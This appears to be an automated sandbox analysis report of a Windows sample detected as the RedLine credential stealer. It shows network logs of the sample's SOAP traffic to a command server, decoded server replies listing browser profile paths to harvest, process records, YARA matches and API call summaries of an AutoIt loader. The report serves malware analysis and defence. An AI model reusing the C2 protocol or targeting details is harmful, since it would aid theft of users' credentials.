Jun 28, 2024 08:58:04.839411020 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839421988 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839432001 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839519978 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839795113 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839803934 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839812040 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839890003 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839900017 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839910030 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839929104 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839939117 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839947939 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839966059 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839976072 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.839996099 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840007067 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840018034 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840096951 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840106010 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840115070 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840125084 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840145111 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840154886 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840166092 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840174913 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840186119 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840195894 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840450048 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840487003 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840708017 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840727091 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840738058 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840748072 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840756893 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840766907 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840776920 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840785027 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840795040 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840804100 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840825081 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840833902 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840842009 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840851068 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840858936 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840867996 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840877056 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840886116 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840894938 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.840900898 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841012955 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841022015 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841029882 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841047049 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841056108 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841067076 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841077089 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841093063 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841100931 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841144085 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841152906 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841171980 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841181993 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841191053 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841208935 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841217995 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841226101 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841234922 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841259956 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841269970 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841278076 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841289043 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841298103 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841316938 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841325998 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841403008 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841413021 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841422081 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841430902 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841439009 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841448069 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841464043 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841473103 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841481924 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841490030 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841497898 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841506004 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841515064 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841523886 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841540098 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.841547966 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:04.979604959 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:05.025592089 CEST	49734	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:05.811933041 CEST	7474	49734	185.38.142.10	192.168.2.4
Jun 28, 2024 08:58:05.830652952 CEST	49733	7474	192.168.2.4	185.38.142.10
Jun 28, 2024 08:58:05.830734968 CEST	49734	7474	192.168.2.4	185.38.142.10

UDP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Jun 28, 2024 08:57:59.429028988 CEST	62296	53	192.168.2.4	1.1.1.1

DNS Queries

Timestamp	Source IP	Dest IP	Trans ID	OP Code	Name	Type	Class	DNS over HTTPS
Jun 28, 2024 08:57:59.429028988 CEST	192.168.2.4	1.1.1.1	0x3b7c	Standard query (0)	api.ip.sb	A (IP address)	IN (0x0001)	false

DNS Answers

Timestamp	Source IP	Dest IP	Trans ID	Reply Code	Name	CName	Address	Type	Class	DNS over HTTPS
Jun 28, 2024 08:57:59.435825109 CEST	1.1.1.1	192.168.2.4	0x3b7c	No error (0)	api.ip.sb	api.ip.sb.cdn.cloudflare.net		CNAME (Canonical name)	IN (0x0001)	false

HTTP Request Dependency Graph

185.38.142.10:7474

HTTP Packets

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
0	192.168.2.4	49731	185.38.142.10	7474	1928	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jun 28, 2024 08:57:53.199131012 CEST	239	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/CheckConnect" Host: 185.38.142.10:7474 Content-Length: 137 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 28, 2024 08:57:53.821779013 CEST	25	IN	HTTP/1.1 100 Continue
Jun 28, 2024 08:57:53.958580017 CEST	359	IN	HTTP/1.1 200 OK Content-Length: 212 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 28 Jun 2024 06:57:53 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 74 72 75 65 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 75 6c 74 3e 3c 2f 43 68 65 63 6b 43 6f 6e 6e 65 63 74 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><CheckConnectResponse xmlns="http://tempuri.org/"><CheckConnectResult>true</CheckConnectResult></CheckConnectResponse></s:Body></s:Envelope>
Jun 28, 2024 08:57:59.015821934 CEST	222	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/EnvironmentSettings" Host: 185.38.142.10:7474 Content-Length: 144 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 28, 2024 08:57:59.194338083 CEST	25	IN	HTTP/1.1 100 Continue
Jun 28, 2024 08:57:59.387831926 CEST	1236	IN	HTTP/1.1 200 OK Content-Length: 4744 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 28 Jun 2024 06:57:59 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 45 6e 76 69 72 6f 6e 6d 65 6e 74 53 65 74 74 69 6e 67 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 3e 3c 61 3a 42 6c 6f 63 6b 65 64 43 6f 75 6e 74 72 79 20 78 6d 6c 6e 73 3a 62 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 6d 69 63 72 6f 73 6f 66 74 2e 63 6f 6d 2f 32 30 30 33 2f 31 30 2f 53 65 72 69 61 6c 69 7a 61 74 69 6f 6e 2f 41 72 72 61 79 73 22 2f 3e 3c 61 3a 42 6c 6f 63 6b 65 64 49 50 20 78 6d 6c [TRUNCATED] Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><EnvironmentSettingsResponse xmlns="http://tempuri.org/"><EnvironmentSettingsResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"><a:BlockedCountry xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:BlockedIP xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"/><a:Object4>true</a:Object4><a:Object6>false</a:Object6><a:ScanBrowsers>true</a:ScanBrowsers><a:ScanChromeBrowsersPaths xmlns:b="http://schemas.microsoft.com/2003/10/Serialization/Arrays"><b:string>%USERPROFILE%\AppData\Local\Battle.net</b:string><b:string>%USERPROFILE%\AppData\Local\Chromium\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Local\Google(x86)\Chrome\User Data</b:string><b:string>%USERPROFILE%\AppData\Roaming\Opera Software\</b:string><b:string>%USERPROFILE%\AppData\Local\MapleStudio\ChromePlus\User Data</b:string [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
1	192.168.2.4	49733	185.38.142.10	7474	1928	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jun 28, 2024 08:58:01.929200888 CEST	220	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/SetEnvironment" Host: 185.38.142.10:7474 Content-Length: 987505 Expect: 100-continue Accept-Encoding: gzip, deflate
Jun 28, 2024 08:58:02.558567047 CEST	25	IN	HTTP/1.1 100 Continue
Jun 28, 2024 08:58:04.330425978 CEST	294	IN	HTTP/1.1 200 OK Content-Length: 147 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 28 Jun 2024 06:58:04 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 53 65 74 45 6e 76 69 72 6f 6e 6d 65 6e 74 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 2f 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><SetEnvironmentResponse xmlns="http://tempuri.org/"/></s:Body></s:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
2	192.168.2.4	49734	185.38.142.10	7474	1928	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe

Timestamp	Bytes transferred	Direction	Data
Jun 28, 2024 08:58:04.342310905 CEST	240	OUT	POST / HTTP/1.1 Content-Type: text/xml; charset=utf-8 SOAPAction: "http://tempuri.org/Endpoint/GetUpdates" Host: 185.38.142.10:7474 Content-Length: 987497 Expect: 100-continue Accept-Encoding: gzip, deflate Connection: Keep-Alive
Jun 28, 2024 08:58:04.979604959 CEST	25	IN	HTTP/1.1 100 Continue
Jun 28, 2024 08:58:05.811933041 CEST	408	IN	HTTP/1.1 200 OK Content-Length: 261 Content-Type: text/xml; charset=utf-8 Server: Microsoft-HTTPAPI/2.0 Date: Fri, 28 Jun 2024 06:58:05 GMT Data Raw: 3c 73 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 73 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 3a 42 6f 64 79 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 74 65 6d 70 75 72 69 2e 6f 72 67 2f 22 3e 3c 47 65 74 55 70 64 61 74 65 73 52 65 73 75 6c 74 20 78 6d 6c 6e 73 3a 61 3d 22 42 72 6f 77 73 65 72 45 78 74 65 6e 73 69 6f 6e 22 20 78 6d 6c 6e 73 3a 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 2f 3e 3c 2f 47 65 74 55 70 64 61 74 65 73 52 65 73 70 6f 6e 73 65 3e 3c 2f 73 3a 42 6f 64 79 3e 3c 2f 73 3a 45 6e 76 65 6c 6f 70 65 3e Data Ascii: <s:Envelope xmlns:s="http://schemas.xmlsoap.org/soap/envelope/"><s:Body><GetUpdatesResponse xmlns="http://tempuri.org/"><GetUpdatesResult xmlns:a="BrowserExtension" xmlns:i="http://www.w3.org/2001/XMLSchema-instance"/></GetUpdatesResponse></s:Body></s:Envelope>

Target ID:	0
Start time:	02:57:49
Start date:	28/06/2024
Path:	C:\Users\user\Desktop\b3u71vBG0u.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\b3u71vBG0u.exe"
Imagebase:	0x740000
File size:	1'072'128 bytes
MD5 hash:	464709F3215D06F6703EB4ECB607AE7A
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: unknown Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000000.00000002.1695088614.00000000023A0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	1
Start time:	02:57:50
Start date:	28/06/2024
Path:	C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\b3u71vBG0u.exe"
Imagebase:	0x820000
File size:	45'984 bytes
MD5 hash:	9D352BC46709F0CB5EC974633A0C3C94
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security Rule: Windows_Trojan_RedLineStealer_f54632eb, Description: unknown, Source: 00000001.00000002.1832406933.0000000000402000.00000040.80000000.00040000.00000000.sdmp, Author: unknown
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:57:50
Start date:	28/06/2024
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Execution Graph

Execution Coverage:	4.2%
Dynamic/Decrypted Code Coverage:	0.4%
Signature Coverage:	5.8%
Total number of Nodes:	2000
Total number of Limit Nodes:	170

Executed Functions

Function 00743B4C Relevance: 19.4, APIs: 8, Strings: 3, Instructions: 153
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00743B7A
IsDebuggerPresent.KERNEL32 ref: 00743B8C
GetFullPathNameW.KERNEL32(00007FFF,?,?,008062F8,008062E0,?,?), ref: 00743BFD

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

Part of subcall function 00750A8D: GetFullPathNameW.KERNEL32(?,00007FFF,?,?,?,00743C26,008062F8,?,?,?), ref: 00750ACE

SetCurrentDirectoryW.KERNEL32(?), ref: 00743C81
MessageBoxA.USER32(00000000,This is a third-party compiled AutoIt script.,007F93F0,00000010), ref: 0077D4BC
SetCurrentDirectoryW.KERNEL32(?,008062F8,?,?,?), ref: 0077D4F4
GetForegroundWindow.USER32(runas,?,?,?,00000001,?,007F5D40,008062F8,?,?,?), ref: 0077D57A
ShellExecuteW.SHELL32(00000000,?,?), ref: 0077D581

Part of subcall function 00743A58: GetSysColorBrush.USER32(0000000F), ref: 00743A62
Part of subcall function 00743A58: LoadCursorW.USER32(00000000,00007F00), ref: 00743A71
Part of subcall function 00743A58: LoadIconW.USER32(00000063), ref: 00743A88
Part of subcall function 00743A58: LoadIconW.USER32(000000A4), ref: 00743A9A
Part of subcall function 00743A58: LoadIconW.USER32(000000A2), ref: 00743AAC
Part of subcall function 00743A58: LoadImageW.USER32(00000063,00000001,00000010,00000010,00000000), ref: 00743AD2
Part of subcall function 00743A58: RegisterClassExW.USER32(?), ref: 00743B28

Part of subcall function 007439E7: CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00743A15
Part of subcall function 007439E7: CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00743A36
Part of subcall function 007439E7: ShowWindow.USER32(00000000,?,?), ref: 00743A4A
Part of subcall function 007439E7: ShowWindow.USER32(00000000,?,?), ref: 00743A53

Part of subcall function 007443DB: _memset.LIBCMT ref: 00744401
Part of subcall function 007443DB: Shell_NotifyIconW.SHELL32(00000000,?), ref: 007444A6

Strings

%}, xrefs: 00743C56
This is a third-party compiled AutoIt script., xrefs: 0077D4B4
runas, xrefs: 0077D575

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: LoadWindow$Icon$CurrentDirectory$CreateFullNamePathShow$BrushClassColorCursorDebuggerExecuteForegroundImageMessageNotifyPresentRegisterShellShell__memmove_memset
String ID: This is a third-party compiled AutoIt script.$runas$%}
API String ID: 529118366-2264255860
Opcode ID: 7e14835cfcdcfc2e7a579936f11daaff6aec676524e7ae8ea389f43f6ca27455
Instruction ID: 69d935ed5902447540f3962d049f6843374522d46ce3bf065d72ec20f2baea18
Opcode Fuzzy Hash: 7e14835cfcdcfc2e7a579936f11daaff6aec676524e7ae8ea389f43f6ca27455
Instruction Fuzzy Hash: 93510430E04289EBCF15ABB4DC49EFD7B79BF05340B008179F559A22A1EB7C5A25CB21

Function 00744FE9 Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 62
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00744EEE,?,?,00000000,00000000), ref: 00744FF9
FindResourceExW.KERNEL32(?,0000000A,SCRIPT,00000000,?,?,00744EEE,?,?,00000000,00000000), ref: 00745010
LoadResource.KERNEL32(?,00000000,?,?,00744EEE,?,?,00000000,00000000,?,?,?,?,?,?,00744F8F), ref: 0077DD60
SizeofResource.KERNEL32(?,00000000,?,?,00744EEE,?,?,00000000,00000000,?,?,?,?,?,?,00744F8F), ref: 0077DD75
LockResource.KERNEL32(Nt,?,?,00744EEE,?,?,00000000,00000000,?,?,?,?,?,?,00744F8F,00000000), ref: 0077DD88

Strings

SCRIPT, xrefs: 00745006
Nt, xrefs: 0077DD85

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000080C000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.000000000081A000.00000002.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_740000_b3u71vBG0u.jbxd

Similarity

API ID: Resource$CreateFindGlobalLoadLockSizeofStream
String ID: SCRIPT$Nt
API String ID: 3051347437-3041533753
Opcode ID: a465296f4f838737b42d08246db205527937550fd0ddf5496c9c9d9ca3dd0d50
Instruction ID: 13358ad012285b9a18625587f3c002d5d12231de47802a5a939374fd36c2776f
Opcode Fuzzy Hash: a465296f4f838737b42d08246db205527937550fd0ddf5496c9c9d9ca3dd0d50
Instruction Fuzzy Hash: 16112A75240B01AFE7218B65DC58F6B7BBEEBC9B51F20816DF406D6260DB75EC008664

Function 00744AFE Relevance: 10.7, APIs: 7, Instructions: 223
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetVersionExW.KERNEL32(?), ref: 00744B2B

Part of subcall function 00747D2C: _memmove.LIBCMT ref: 00747D66

GetCurrentProcess.KERNEL32(?,007CFAEC,00000000,00000000,?), ref: 00744BF8
IsWow64Process.KERNEL32(00000000), ref: 00744BFF
GetNativeSystemInfo.KERNELBASE(00000000), ref: 00744C45
FreeLibrary.KERNEL32(00000000), ref: 00744C50
GetSystemInfo.KERNEL32(00000000), ref: 00744C81
GetSystemInfo.KERNEL32(00000000), ref: 00744C8D

Memory Dump Source

Source File: 00000000.00000002.1694321510.0000000000741000.00000020.00000001.01000000.00000003.sdmp, Offset: 00740000, based on PE: true

Associated: 00000000.00000002.1694272778.0000000000740000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007CF000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694474178.00000000007F5000.00000002.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694535562.00000000007FF000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1694553912.0000000000808000.00000002.00000001.01000000.00000003.sdmpDownload File
